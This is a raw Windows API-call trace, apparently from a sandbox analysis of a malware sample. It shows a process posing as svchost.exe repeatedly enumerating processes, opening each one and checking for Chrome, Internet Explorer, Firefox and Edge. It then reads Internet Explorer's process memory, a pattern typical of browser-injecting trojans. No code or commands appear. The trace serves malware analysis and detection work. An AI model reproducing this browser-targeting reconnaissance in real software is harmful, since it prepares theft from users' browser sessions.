	[0210.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.565] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.565] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0210.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.566] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.566] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0210.567] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x37c8
	[0210.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.567] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0210.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.567] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.568] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0210.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.568] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.568] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0210.569] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x37cc
	[0210.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.570] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0210.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.570] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.570] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0210.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.570] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.570] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0210.571] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x37d0
	[0210.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.571] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0210.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.572] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.572] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0210.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.572] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.572] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0210.573] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x37d4
	[0210.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.573] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0210.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.573] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.574] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0210.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.574] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.575] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0210.575] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x37d8
	[0210.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.575] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0210.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.576] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.577] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0210.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.577] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.578] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0210.578] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x37dc
	[0210.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.578] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0210.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.579] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.579] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0210.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.580] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.580] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0210.581] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x37e0
	[0210.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.581] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0210.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.581] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.582] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0210.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.583] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.583] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0210.584] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x37e4
	[0210.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.584] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0210.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.584] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.585] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0210.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.586] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.586] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0210.587] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x37e8
	[0210.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.587] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0210.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.587] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0210.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.587] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0210.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.588] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.588] NtQueryInformationProcess (in: ProcessHandle=0x37e8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0210.588] ReadProcessMemory (in: hProcess=0x37e8, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0210.588] ReadProcessMemory (in: hProcess=0x37e8, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0210.588] ReadProcessMemory (in: hProcess=0x37e8, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0210.588] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0210.589] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0210.589] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x37ec
	[0210.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.589] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0210.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.590] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0210.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.590] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0210.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.590] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.590] NtQueryInformationProcess (in: ProcessHandle=0x37ec, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0210.590] ReadProcessMemory (in: hProcess=0x37ec, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0210.590] ReadProcessMemory (in: hProcess=0x37ec, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0210.591] ReadProcessMemory (in: hProcess=0x37ec, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0210.591] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0210.591] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0210.591] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x37f0
	[0210.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.592] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0210.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.592] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.592] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0210.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.593] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.593] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0210.593] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x37f4
	[0210.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.593] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0210.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.594] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.594] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0210.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.594] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.595] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.595] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x37f8
	[0210.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.595] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.596] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.596] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.596] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.597] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.597] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.598] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x37fc
	[0210.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.598] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.598] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.599] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.599] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.599] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0210.600] CloseHandle (hObject=0x188) returned 1
	[0210.600] Sleep (dwMilliseconds=0x64) 
	[0210.695] GetCurrentProcessId () returned 0x110
	[0210.695] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0210.699] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0210.700] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0210.702] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0210.703] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x3804
	[0210.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.703] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0210.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.704] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.704] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0210.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.705] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.705] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0210.707] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x3808
	[0210.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.707] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0210.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.708] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.708] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0210.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.709] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.709] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0210.710] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x380c
	[0210.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.710] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0210.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.711] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.711] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0210.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.711] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.711] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0210.712] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x3810
	[0210.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.712] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0210.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.713] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.713] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0210.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.713] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.713] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0210.714] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x3814
	[0210.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.714] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0210.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.714] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.715] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0210.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.715] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.715] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0210.716] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x3818
	[0210.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.716] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0210.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.716] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.717] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0210.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.717] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.717] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0210.718] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x381c
	[0210.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.718] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0210.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.718] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.719] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0210.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.719] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
